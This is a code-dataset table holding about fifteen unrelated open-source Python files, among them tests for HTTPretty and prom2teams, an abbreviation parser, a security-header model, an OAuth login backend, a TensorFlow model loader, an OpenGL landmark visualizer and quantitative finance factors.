max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/bugfixes/nosetests/test_redis.py | kerokim/HTTPretty | 1,253 | 12717328 | import os
import requests
import httpretty
try:
from redis import Redis
except ImportError:
Redis = None
from unittest import skipUnless
def redis_available():
if Redis is None:
return False
params = dict(
host=os.getenv('REDIS_HOST') or '127.0.0.1',
port=int(os.getenv('REDIS_PORT') or 6379)
)
conn = Redis(**params)
try:
conn.keys('*')
conn.close()
return True
except Exception:
return False
@skipUnless(redis_available(), reason='no redis server available for test')
@httpretty.activate()
def test_work_in_parallel_to_redis():
"HTTPretty should passthrough redis connections"
redis = Redis()
keys = redis.keys('*')
for key in keys:
redis.delete(key)
redis.append('item1', 'value1')
redis.append('item2', 'value2')
sorted(redis.keys('*')).should.equal([b'item1', b'item2'])
httpretty.register_uri(
httpretty.GET,
"http://redis.io",
body="salvatore")
response = requests.get('http://redis.io')
response.text.should.equal('salvatore')
|
nlpre/identify_parenthetical_phrases.py | thoppe/NLPre | 186 | 12717330 | import collections
from .Grammars import parenthesis_nester
import logging
import string
class identify_parenthetical_phrases(object):
"""
Parser to identify abbreviations of phrases found in a parenthesis, ex.
Health and Human Services (HHS) and Office of the Director (OD).
"""
def __init__(self):
""" Initialize the parser. """
self.parser = parenthesis_nester()
self.logger = logging.getLogger(__name__)
def __call__(self, text):
"""
Runs the parser. Returns a count of how often the phrases are
used in the document.
Args:
text: a string document
Returns:
results: A collections.counter object
"""
text = text.replace("-", " ")
text = text.replace("'", "")
text = text.replace('"', "")
tokens = self.parser(text)
results = collections.Counter()
for k, item in enumerate(tokens):
word = self._is_valid_abbr(item)
if word:
subtokens = self._check_matching(word, k, tokens)
if subtokens:
results[(tuple(subtokens), word)] += 1
if results:
self.logger.info("Counter: %s" % results)
return results
def _is_valid_abbr(self, item):
"""
Args:
item: a list of tokens
Returns:
word: the abbreviation, a string token
"""
if isinstance(item, str):
return False
if len(item) != 1:
return False
word = item[0]
# Break if we are doubly nested
if not isinstance(word, str):
return False
# Check if there are any capital letters
if word.lower() == word:
return False
return word
def _check_matching(self, word, k, tokens):
"""
Args:
word: a string
k: the position of the word in tokens, an int
tokens: a list of strings"
Returns:
subtokens: a tuple of string tokens of the abbreviated phrase
"""
# Identify the capital letters
caps = [let for let in word if let in string.ascii_uppercase.upper()]
# Don't try to match with only a single letter (too noisy!)
if len(caps) < 2:
return False
# This may fail if used too early in doc or if nested parens
# this shouldn't be a match so it's OK!
# try:
# subtokens = tokens[k - len(caps):k]
# subtoken_let = [let.upper()[0] for let in subtokens]
# except:
# return False
subtokens = tokens[k - len(caps) : k]
subtoken_let = [
let.upper()[0] for let in subtokens if isinstance(let, str)
]
"""
If the subtokens don't provide a perfect match of the abbreviation,
we must check if there are filler words. ie. "Health and Human
Services (HHS)" doesn't provide a match above because "and" isn't
represented in the abbreviation. To account for this we iterate
backwards from the abbreviation, trying to reconstruct the
abbreviation by ignoring filler words.
"""
if subtoken_let != caps:
tokens_to_remove = [
"and",
"of",
"with",
"&",
"or",
"for",
"the",
"to",
]
subtokens = []
x = k - 1
cutoff = x - len(caps) * 2
while subtoken_let != caps:
if x < 0 or x < cutoff:
return False
token = tokens[x]
if isinstance(token, str):
subtokens.insert(0, token)
subtoken_let = [
let.upper()[0]
for let in subtokens
if let not in tokens_to_remove
]
x -= 1
else:
x -= 1
cutoff -= 1
continue
return tuple(subtokens)
# if __name__ == "__main__":
# Right now, two of of three of these phrases are correctly found.
# P = identify_parenthetical_phrases()
# text = ("The Environmental Protection Agency (EPA) is not a government "
# "organization (GO) of Health and Human Services (HHS).")
# print(P(text))
|
securityheaders/models/xxssprotection/xxssprotection.py | th3cyb3rc0p/securityheaders | 151 | 12717345 | from securityheaders.models import SecurityHeader
from securityheaders.models.xxssprotection import XXSSProtectionDirective
from securityheaders.models.annotations import *
@requiredheader
@description('This header sets the configuration for the cross-site scripting filter built into most browsers. The recommended value is "X-XSS-Protection: 1; mode=block')
@headername('x-xss-protection')
@headerref('https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/dd565647(v=vs.85)')
class XXSSProtection(SecurityHeader):
directive = XXSSProtectionDirective
def __init__(self, unparsedstring):
SecurityHeader.__init__(self, unparsedstring, XXSSProtectionDirective)
def one(self):
try:
return XXSSProtectionDirective.ONE in self.parsedstring
except error:
return False
def zero(self):
try:
return XXSSProtectionDirective.ZERO in self.parsedstring
except error:
return False
def mode(self):
result = None
if self.parsedstring and XXSSProtectionDirective.MODE in self.parsedstring:
if isinstance(self.parsedstring[XXSSProtectionDirective.MODE], list):
if len(self.parsedstring[XXSSProtectionDirective.MODE]) > 0:
result = self.parsedstring[XXSSProtectionDirective.MODE][0]
else:
result = ""
else:
result = self.parsedstring[XXSSProtectionDirective.MODE]
return result
def report(self):
result = None
if self.parsedstring and XXSSProtectionDirective.REPORT in self.parsedstring:
if isinstance(self.parsedstring[XXSSProtectionDirective.REPORT], list):
if len(self.parsedstring[XXSSProtectionDirective.REPORT]) > 0:
result = self.parsedstring[XXSSProtectionDirective.REPORT][0]
else:
result = ""
else:
result = self.parsedstring[XXSSProtectionDirective.REPORT]
return result
|
controller/deis/wsgi.py | yun-an/deis | 3,375 | 12717346 | <reponame>yun-an/deis
"""
WSGI config for deis project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
"""
from __future__ import unicode_literals
import os
from django.core.wsgi import get_wsgi_application
import static
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "deis.settings")
class Dispatcher(object):
"""
Dispatches requests between two WSGI apps, a static file server and a
Django server.
"""
def __init__(self):
self.django_handler = get_wsgi_application()
self.static_handler = static.Cling(os.path.dirname(os.path.dirname(__file__)))
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith('/static'):
return self.static_handler(environ, start_response)
else:
return self.django_handler(environ, start_response)
application = Dispatcher()
|
tests/test_json_fields.py | trevorbox/prom2teams | 180 | 12717354 | import unittest
import os
import json
from prom2teams.teams.alert_mapper import map_prom_alerts_to_teams_alerts
from prom2teams.prometheus.message_schema import MessageSchema
from prom2teams.app.sender import AlertSender
from deepdiff import DeepDiff
class TestJSONFields(unittest.TestCase):
TEST_CONFIG_FILES_PATH = './tests/data/json_files/'
def test_json_with_all_fields(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertNotIn('unknown', str(alert))
def test_json_without_mandatory_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_mandatory_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertIn('unknown', str(alert))
def test_json_without_optional_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_optional_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertIn("'description': 'unknown'", str(alert))
def test_json_without_instance_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_instance_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertEqual('unknown', str(alert['instance']))
def test_fingerprint(self):
with open(self.TEST_CONFIG_FILES_PATH + 'all_ok.json') as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertEqual('dd19ae3d4e06ac55', str(alert['fingerprint']))
def test_without_fingerprint(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_fingerprint.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_without_fingerprint.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
self.assertEqual(json_rendered.keys(), json_expected.keys())
def test_compose_all(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_common_items(self):
self.maxDiff = None
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'with_common_items.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_with_common_items.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
self.assertEqual(json_rendered.keys(), json_expected.keys())
def test_grouping_multiple_alerts(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_multiple.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_multiple.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender(group_alerts_by='name')._create_alerts(alerts)[0].replace("\n\n\n", " ")
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_extra_labels(self):
excluded_labels = ('pod_name', )
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_extra_labels.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_extra_labels.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema(exclude_fields=excluded_labels).load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_extra_annotations(self):
excluded_annotations = ('message', )
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_extra_annotations.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_extra_annotations.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema(exclude_annotations=excluded_annotations).load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_too_long_payload(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_multiple.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_splitted.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = '[' + ','.join([a.replace("\n\n\n", " ") for a in AlertSender(group_alerts_by='name', teams_client_config={'MAX_PAYLOAD': 800})._create_alerts(alerts)]) + ']'
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
if __name__ == '__main__':
unittest.main()
|
paas-ce/paas/login/ee_official_login/oauth/google/backends.py | renmcc/bk-PaaS | 767 | 12717362 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
from common.log import logger
from .utils import get_access_token, get_scope_data
class OauthBackend(ModelBackend):
"""
自定义认证方法
"""
def authenticate(self, code=None):
# Google登录验证
try:
# 调用接口验证登录票据CODE,并获取access_token
access_token = get_access_token(code)
if not access_token:
return None
# 通过access_token 获取用户信息
userinfo = get_scope_data(access_token)
if not userinfo:
return None
# 验证通过
username = userinfo.get('username')
# 获取User类
user_model = get_user_model()
# 获取或生成User对象,并根据需要设置用户信息和角色
try:
user = user_model.objects.get(username=username)
except user_model.DoesNotExist:
# 创建User对象
user = user_model.objects.create_user(username)
# 获取用户信息,只在第一次创建时设置,已经存在不更新
chname = userinfo.get('chname', '')
phone = userinfo.get('phone', '')
email = userinfo.get('email', '')
user.chname = chname
user.phone = phone
user.email = email
user.save()
# note: 可根据需要设置用户角色, user_model.objects.modify_user_role(...)
# note: 可根据需要每次都更新用户信息等,或每次都更新用户角色等
return user
except Exception:
logger.exception("Google login backend validation error!")
return None
|
waveform_analysis/weighting_filters/__init__.py | pirun/waveform_analysis | 125 | 12717421 | <reponame>pirun/waveform_analysis<filename>waveform_analysis/weighting_filters/__init__.py
from .ABC_weighting import *
from .ITU_R_468_weighting import *
|
TensorFlow_v1/test_pb.py | leimao/Graph_Frozen_Load_TensorFlow | 200 | 12717424 | <reponame>leimao/Graph_Frozen_Load_TensorFlow<gh_stars>100-1000
import tensorflow as tf
import numpy as np
import argparse
from cifar import CIFAR10
from utils import model_accuracy
from tensorflow.python.framework import tensor_util
# If load from pb, you may have to use get_tensor_by_name heavily.
class CNN(object):
def __init__(self, model_filepath):
# The file path of model
self.model_filepath = model_filepath
# Initialize the model
self.load_graph(model_filepath=self.model_filepath)
def load_graph(self, model_filepath):
'''
Lode trained model.
'''
print('Loading model...')
self.graph = tf.Graph()
with tf.gfile.GFile(model_filepath, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
print('Check out the input placeholders:')
nodes = [
n.name + ' => ' + n.op for n in graph_def.node
if n.op in ('Placeholder')
]
for node in nodes:
print(node)
with self.graph.as_default():
# Define input tensor
self.input = tf.placeholder(np.float32,
shape=[None, 32, 32, 3],
name='input')
self.dropout_rate = tf.placeholder(tf.float32,
shape=[],
name='dropout_rate')
tf.import_graph_def(graph_def, {
'input': self.input,
'dropout_rate': self.dropout_rate
})
self.graph.finalize()
print('Model loading complete!')
# Get layer names
layers = [op.name for op in self.graph.get_operations()]
for layer in layers:
print(layer)
"""
# Check out the weights of the nodes
weight_nodes = [n for n in graph_def.node if n.op == 'Const']
for n in weight_nodes:
print("Name of the node - %s" % n.name)
# print("Value - " )
# print(tensor_util.MakeNdarray(n.attr['value'].tensor))
"""
# In this version, tf.InteractiveSession and tf.Session could be used interchangeably.
# self.sess = tf.InteractiveSession(graph = self.graph)
self.sess = tf.Session(graph=self.graph)
def test(self, data):
# Know your output node name
output_tensor = self.graph.get_tensor_by_name("import/cnn/output:0")
output = self.sess.run(output_tensor,
feed_dict={
self.input: data,
self.dropout_rate: 0
})
return output
def test_from_frozen_graph(model_filepath):
tf.reset_default_graph()
# Load CIFAR10 dataset
cifar10 = CIFAR10()
x_test = cifar10.x_test
y_test = cifar10.y_test
y_test_onehot = cifar10.y_test_onehot
num_classes = cifar10.num_classes
input_size = cifar10.input_size
# Test 500 samples
x_test = x_test[0:500]
y_test = y_test[0:500]
model = CNN(model_filepath=model_filepath)
test_prediction_onehot = model.test(data=x_test)
test_prediction = np.argmax(test_prediction_onehot, axis=1).reshape(
(-1, 1))
test_accuracy = model_accuracy(label=y_test, prediction=test_prediction)
print('Test Accuracy: %f' % test_accuracy)
def main():
model_pb_filepath_default = './model/cifar10_cnn.pb'
# Argparser
parser = argparse.ArgumentParser(
description='Load and test model from frozen graph pb file.')
parser.add_argument('--model_pb_filepath',
type=str,
help='model pb-format frozen graph file filepath',
default=model_pb_filepath_default)
argv = parser.parse_args()
model_pb_filepath = argv.model_pb_filepath
test_from_frozen_graph(model_filepath=model_pb_filepath)
if __name__ == '__main__':
main()
|
examples/subs.py | tgolsson/appJar | 666 | 12717466 | <reponame>tgolsson/appJar
import sys
sys.path.append("../")
from appJar import gui
def login(btn):
app.hideSubWindow("Login")
app.show()
def stopSub(btn=None):
return False
app = gui()
app.addLabel("la", "la")
app.startSubWindow("Login")
app.setStopFunction(stopSub)
app.addLabel("l2", "Login Window")
app.addButton("SUBMIT", login)
app.stopSubWindow()
app.startSubWindow("Other")
app.addLabel("l3", "Other Window")
app.stopSubWindow()
app.addButton("Other", app.showSubWindow)
app.go(startWindow="Login")
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/AnalyticalRigidLinksOption.py | htlcnn/ironpython-stubs | 182 | 12717475 | class AnalyticalRigidLinksOption(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies how Rigid Links will be made for the Analytical Model.
enum AnalyticalRigidLinksOption,values: Disabled (1),Enabled (0),FromColumn (2)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Disabled=None
Enabled=None
FromColumn=None
value__=None
|
tests/test_img_path_utils.py | weblucas/mseg-semantic | 391 | 12717477 | #!/usr/bin/python3
from pathlib import Path
from mseg_semantic.utils.img_path_utils import (
dump_relpath_txt,
get_unique_stem_from_last_k_strs
)
_ROOT = Path(__file__).resolve().parent
def test_dump_relpath_txt():
""" """
jpg_dir = f'{_ROOT}/test_data/test_imgs_relpaths'
txt_output_dir = f'{_ROOT}/test_data/temp_files'
txt_save_fpath = dump_relpath_txt(jpg_dir, txt_output_dir)
lines = open(txt_save_fpath).readlines()
lines = [line.strip() for line in lines]
gt_lines = [
'0016E5_08159.png',
'ADE_train_00000001.jpg'
]
assert gt_lines == lines
def test_get_unique_stem_from_last_k_strs_k1():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=1)
assert new_fname == '_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k2():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=2)
assert new_fname == 'aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k3():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=3)
assert new_fname == 'a_aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k4():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=4)
assert new_fname == 'training_a_aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k5():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=5)
assert new_fname == 'images_training_a_aiport_terminal_ADE_train_00000001_seg'
if __name__ == '__main__':
""" """
test_dump_relpath_txt()
test_get_unique_stem_from_last_k_strs_k1()
test_get_unique_stem_from_last_k_strs_k2()
test_get_unique_stem_from_last_k_strs_k3()
test_get_unique_stem_from_last_k_strs_k4()
test_get_unique_stem_from_last_k_strs_k5()
|
programs/pyeos/tests/python/rpctest/rpctest.py | learnforpractice/pyeos | 144 | 12717500 | from eoslib import *
code = N('rpctest')
def sayHello():
n = N('rpctest')
id = N('name')
name = read_action()
print('hello', name)
itr = db_find_i64(n, n, n, id)
if itr >= 0: # value exist, update it
old_name = db_get_i64(itr)
print('hello,', old_name)
db_update_i64(itr, n, name)
else:
db_store_i64(n, n, n, id, name)
def test():
n = N('rpctest')
id = N('name')
name = read_action()
print('hello', name)
itr = db_find_i64(n, n, n, id)
if itr >= 0: # value exist, update it
old_name = db_get_i64(itr)
print('hello,', old_name)
else:
print('not found!')
def apply(receiver, code, action):
if action == N('sayhello'):
msg = read_action()
key = N('hellooo')
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
itr = db_find_i64(code, code, code, key)
print('find 1: ', itr)
while itr >= 0:
db_remove_i64(itr)
itr = db_find_i64(code, code, code, key)
print('find 2:', itr)
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
itr = db_store_i64(code, code, code, key, msg)
print('store: ', itr)
if itr != -1:
ret = db_get_i64(itr)
print('ret: ', ret)
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
# print('read_action:', read_action())
#] sayHello()
|
gen2-triangulation/visualizer.py | ibaiGorordo/depthai-experiments | 381 | 12717515 | import pygame
from pygame.locals import DOUBLEBUF, OPENGL, RESIZABLE
import math
import numpy as np
from OpenGL.GL import glLineWidth, glBegin, GL_LINES, glColor3f, glVertex3fv, glEnd, glPointSize, GL_POINTS, glVertex3f, \
glScaled, GLfloat, glGetFloatv, GL_MODELVIEW_MATRIX, glRotatef, glTranslatef, glClear, GL_COLOR_BUFFER_BIT, \
GL_DEPTH_BUFFER_BIT
from OpenGL.GLU import gluPerspective
lastPosX = 0
lastPosY = 0
zoomScale = 1.0
dataL = 0
xRot = 0
yRot = 0
zRot = 0
def landmark_visualizer(landmarks, cameras, left_landmarks, right_landmarks):
glLineWidth(1.5)
glBegin(GL_LINES)
glColor3f(0.0, 1.0, 0.0)
for landmark in landmarks:
glVertex3fv(cameras[0])
glVertex3fv(landmark)
glColor3f(0.0, 0.0, 1.0)
for landmark in landmarks:
glVertex3fv(cameras[1])
glVertex3fv(landmark)
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(landmarks)):
glVertex3f(landmarks[i][0], landmarks[i][1], landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(cameras)):
glVertex3f(cameras[i][0], cameras[i][1], cameras[i][2])
glEnd()
glLineWidth(1.5)
glBegin(GL_LINES)
glColor3f(0.0, 1.0, 0.0)
for landmark in left_landmarks:
glVertex3fv(cameras[0])
glVertex3fv(landmark)
glColor3f(0.0, 0.0, 1.0)
for landmark in right_landmarks:
glVertex3fv(cameras[1])
glVertex3fv(landmark)
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(left_landmarks)):
glVertex3f(left_landmarks[i][0], left_landmarks[i][1], left_landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(right_landmarks)):
glVertex3f(right_landmarks[i][0], right_landmarks[i][1], right_landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(cameras)):
glVertex3f(cameras[i][0], cameras[i][1], cameras[i][2])
glEnd()
def mouseMove(event):
global lastPosX, lastPosY, zoomScale, xRot, yRot, zRot
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 4:
glScaled(1.05, 1.05, 1.05)
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 5:
glScaled(0.95, 0.95, 0.95)
if event.type == pygame.MOUSEMOTION:
x, y = event.pos
dx = x - lastPosX
dy = y - lastPosY
mouseState = pygame.mouse.get_pressed()
if mouseState[0]:
modelView = (GLfloat * 16)()
mvm = glGetFloatv(GL_MODELVIEW_MATRIX, modelView)
temp = (GLfloat * 3)()
temp[0] = modelView[0] * dy + modelView[1] * dx
temp[1] = modelView[4] * dy + modelView[5] * dx
temp[2] = modelView[8] * dy + modelView[9] * dx
norm_xy = math.sqrt(temp[0] * temp[0] + temp[1] * temp[1] + temp[2] * temp[2])
glRotatef(math.sqrt(dx * dx + dy * dy), temp[0] / norm_xy, temp[1] / norm_xy, temp[2] / norm_xy)
lastPosX = x
lastPosY = y
def initialize_OpenGL():
pygame.init()
display = (300, 300)
pygame.display.set_mode(display, DOUBLEBUF | OPENGL, RESIZABLE)
gluPerspective(45, (1.0 * display[0] / display[1]), 0.1, 50.0)
glTranslatef(0.0, 0.0, -5)
def start_OpenGL(landmarks, cameras, left_landmarks, right_landmarks):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
mouseMove(event)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
landmark_visualizer(landmarks, cameras, left_landmarks, right_landmarks)
pygame.display.flip()
pygame.time.wait(1)
def get_vector_direction(camera_position, landmark):
vector = []
for i in range(3):
vector.append(landmark[i] - camera_position[i])
return np.array(vector)
def get_vector_intersection(left_vector, left_camera_position, right_vector, right_camera_position):
n = np.cross(left_vector, right_vector)
n1 = np.cross(left_vector, n)
n2 = np.cross(right_vector, n)
top = np.dot(np.subtract(right_camera_position, left_camera_position), n2)
bottom = np.dot(left_vector, n2)
divided = top / bottom
mult = divided * left_vector
c1 = left_camera_position + mult
top = np.dot(np.subtract(left_camera_position, right_camera_position), n1)
bottom = np.dot(right_vector, n1)
divided = top / bottom
mult = divided * right_vector
c2 = right_camera_position + mult
center = (c1 + c2) / 2
return center
|
3d/scripts/generate_snapshot.py | chrisdearman/splitflap | 2,138 | 12717575 | #!/usr/bin/env python
# Copyright 2015-2016 <NAME> and the splitflap contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import errno
import logging
import os
import openscad
logging.basicConfig(level=logging.DEBUG)
output_folder = os.path.join('build')
try:
os.makedirs(output_folder)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(output_folder):
pass
else:
raise
openscad.run(
'splitflap.scad',
os.path.join(output_folder, 'snapshot.png'),
output_size = [1280, 1024],
camera_translation = [0, 0, 0],
camera_rotation = [60, 0, 135],
camera_distance = 600,
colorscheme = 'Nature',
)
|
spectre/factors/feature.py | rajach/spectre | 302 | 12717596 | <reponame>rajach/spectre
"""
@author: Heerozh (<NAME>)
@copyright: Copyright 2019-2020, Heerozh. All rights reserved.
@license: Apache 2.0
@email: <EMAIL>
"""
import warnings
from .datafactor import DatetimeDataFactor
from .factor import CrossSectionFactor, CustomFactor
from .basic import Returns
from ..parallel import nanstd, nanmean, nansum
# ----------- Common Market Features -----------
class MarketDispersion(CrossSectionFactor):
"""Cross-section standard deviation of universe stocks returns."""
inputs = (Returns(), )
win = 1
def compute(self, returns):
ret = nanstd(returns, dim=1).unsqueeze(-1)
return ret.repeat(1, returns.shape[1])
class MarketReturn(CrossSectionFactor):
"""Cross-section mean returns of universe stocks."""
inputs = (Returns(), )
win = 1
def compute(self, returns):
ret = nanmean(returns, dim=1).unsqueeze(-1)
return ret.repeat(1, returns.shape[1])
class MarketVolatility(CustomFactor):
"""MarketReturn Rolling standard deviation."""
inputs = (MarketReturn(), 252)
win = 252
_min_win = 2
def compute(self, returns, annualization_factor):
return (returns.nanvar() * annualization_factor) ** 0.5
class AdvanceDeclineRatio(CrossSectionFactor):
"""Need to work with MA, and could be applied to volume too"""
inputs = (Returns(), )
win = 1
def compute(self, returns):
advancing = nansum(returns > 0, dim=1)
declining = nansum(returns < 0, dim=1)
ratio = (advancing / declining).unsqueeze(-1)
return ratio.repeat(1, returns.shape[1])
# ----------- Asset-specific data -----------
class AssetData(CustomFactor):
def __init__(self, asset, factor):
self.asset = asset
self.asset_ind = None
super().__init__(win=1, inputs=[factor])
def pre_compute_(self, engine, start, end):
super().pre_compute_(engine, start, end)
if not engine.align_by_time:
warnings.warn("Make sure your data is aligned by time, otherwise will cause data "
"disorder. Or set engine.align_by_time = True.",
RuntimeWarning)
self.asset_ind = engine.dataframe_index[1].unique().categories.get_loc(self.asset)
def compute(self, data):
ret = data[self.asset_ind]
return ret.repeat(data.shape[0], 1)
# ----------- Common Calendar Features -----------
MONTH = DatetimeDataFactor('month')
WEEKDAY = DatetimeDataFactor('weekday')
QUARTER = DatetimeDataFactor('quarter')
